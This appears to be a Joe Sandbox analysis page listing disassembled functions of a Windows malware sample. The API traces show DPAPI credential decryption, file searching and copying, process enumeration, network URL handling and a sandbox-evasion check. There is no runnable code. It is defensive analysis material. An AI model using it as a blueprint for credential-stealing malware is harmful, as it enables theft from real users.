Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,041434C0), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,041477F8), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: b7f4a53806341329f0c8cf58e5e612071402de3d3ed0e05b65ae4abbc920533e
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: b7f4a53806341329f0c8cf58e5e612071402de3d3ed0e05b65ae4abbc920533e
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,041431B0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,041431B0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 004067C2, 00406884, 0040684E, 0040689F, 0040679E

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,04143380), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,041433F0), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04143490), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,04143380), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,041433F0), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04143490), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,04147EF8), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,041434A0), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 6CCF3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CCF3095

Part of subcall function 6CCF35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CD7F688,00001000), ref: 6CCF35D5
Part of subcall function 6CCF35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CCF35E0
Part of subcall function 6CCF35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CCF35FD
Part of subcall function 6CCF35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CCF363F
Part of subcall function 6CCF35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CCF369F
Part of subcall function 6CCF35A0: __aulldiv.LIBCMT ref: 6CCF36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CCF309F

Part of subcall function 6CD15B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CD156EE,?,00000001), ref: 6CD15B85
Part of subcall function 6CD15B50: EnterCriticalSection.KERNEL32(6CD7F688,?,?,?,6CD156EE,?,00000001), ref: 6CD15B90
Part of subcall function 6CD15B50: LeaveCriticalSection.KERNEL32(6CD7F688,?,?,?,6CD156EE,?,00000001), ref: 6CD15BD8
Part of subcall function 6CD15B50: GetTickCount64.KERNEL32 ref: 6CD15BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CCF30BE

Part of subcall function 6CCF30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CCF3127
Part of subcall function 6CCF30F0: __aulldiv.LIBCMT ref: 6CCF3140

Part of subcall function 6CD2AB2A: __onexit.LIBCMT ref: 6CD2AB30

Memory Dump Source

Source File: 00000000.00000002.2196135019.000000006CCF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CCF0000, based on PE: true

Associated: 00000000.00000002.2196118834.000000006CCF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196180891.000000006CD6D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196200691.000000006CD7E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2196218365.000000006CD82000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ccf0000_q27UFusYdn.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: c9e522e46ffa2c850938c49eeeef7d1043ff5ac260e5195a321598bd66ffa117
Instruction ID: 89b9acfa53d4e5c6a6f14a6b34e172dedf9831d10d17c81a72d078e6af9431e7
Opcode Fuzzy Hash: c9e522e46ffa2c850938c49eeeef7d1043ff5ac260e5195a321598bd66ffa117
Instruction Fuzzy Hash: C1F0F922D20754A6EB21EF3488412FA7378EF6B118F505319EA5553561FB3062D883A2

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

